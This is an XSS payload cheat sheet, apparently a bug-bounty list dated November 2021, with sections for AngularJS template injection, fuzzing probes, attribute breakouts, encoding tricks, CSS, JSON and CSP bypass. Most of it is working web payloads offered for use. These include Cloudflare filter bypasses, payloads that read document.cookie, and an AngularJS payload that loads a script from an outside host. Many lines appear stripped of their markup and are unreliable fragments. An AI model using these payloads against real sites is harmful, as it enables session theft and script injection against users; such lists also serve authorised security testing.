
'"></title></textarea></script></iframe></noscript><img src=x onerror=alert()>{{constructor.constructor('alert(1)')()}}

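// AngularJS (client-side template injection; evaluated only where the input is rendered inside an AngularJS-compiled template):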

 

{{constructor.constructor('alert(1)')()}}

 

{{

constructor.constructor("var _ = document.createElement('script');

_.src='https://prsua.xss.ht';

document.getElementsByTagName('body')[0].appendChild(_)")()

}}

 

 

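// FUZZING (probes showing which characters are reflected unencoded; a rendered 64 for {{8*8}} means the input is evaluated as a template expression):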

 

A'">{{8*8}}

 

%uff1cimg%uff1e

 

><img>

 

 

// HTML and JS

 

click

 

 

 

Click

 

'">

 

'">

 

<>

 

 

 

">

 

 

 

">

 

 

 

 

 

 

 

": '';">

 

audio{a" onerror=alert(document.domain)>":""}

 

'">alert`_Y000!_`

 

${alert(1)}"'-alert()-'"

 

'">{{constructor.constructor('alert(1)')()}}

 

A'">

 

“>

 

A'">{{constructor.constructor('alert(1)')()}}

 

'">

 

A'">S

 

A'">

 

test

 

A'">

 

A'">

 

A'">

 

A'">Try to copy me

 

A'"> // Shortest payload

 

A'">

 

 

 

A'">Test

 

 

// HTML injection (if XSS execution and dangling markup are not working):

 

TEST

 

 

 

 

// tag URL and tag:

 

javascript:alert(9);//https://www.netigate.net/dd

 

javascript:var{a:onerror}={a:alert};throw document.cookie //Cloudflare XSS bypass

 

javascript:var{a:onerror}={a:alert};throw 1

 

test //Cloudflare and Filter Bypass by XPLOITERR

 

"+self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// //Cloudflare XSS bypass

 

 

www.brutelogic.com.br/1.js

 

javascript:alert(document.domain)//http://google.com/uploads/pwned.jpg

 

Xp

 

javascript://%0Aalert(document.domain)

 

javascript:alert(document.cookie);

 

%27;alert(1);//

 

\"+confirm(1)+"

 

'*alert(1)*'

 

 

// Encoding

 

><img src=x onerror=alert()>

 

'"></title></textarea></script></iframe></noscript><img onerror=prompt() src=x>

 

A></title><</script><img src=x onerror=[1].find(alert)>

 

<svg/onload&equals;alert(1)>

 

"&gt;&lt;img src=x onerror=alert(document.domain)&gt;

 

 

// Inside an attribute value, breaking out with ":

 

"onfocus=alert() autofocus="

 

"'-alert(document.body.innerHTML='XPLOITERR')-'"

 

"type=xx autofocus onfocus=alert(1)//

 

"onmouseover=document.documentElement.textContent=document.documentElement.outerHTML c="

 

"onmouseover=javascript:window.onerror=alert;throw[1] c=" (when parentheses () and backticks `` are blocked)

 

"onmouseover=javascript:window.throw[onerror]=[alert],1

 

a=8,b=confirm,c=window,c.onerror=b;throw-a

 

"onmouseover=alert(1) //

 

"autofocus onfocus=alert(1) //

 

 

// JS template literal XSS:

 

${alert(1)}

 

 

// Hidden fields:

 

" accesskey="X" ONCLICK=confirm() X="

 

"accesskey='x' onclick='confirm`1`' //

 

%2527x%2527%2520onclick=%2527confirm`1`%2527%2520

 

// CSS XSS:

 

">

@keyframes

 

x{}>

 

CSS<

 

">

 

 

// JSON:

 

{

"url":"javascript://test%0aalert(document.domain)"

}

 

// CSP BYPASS:

 

">

Uploaded on November 20, 2021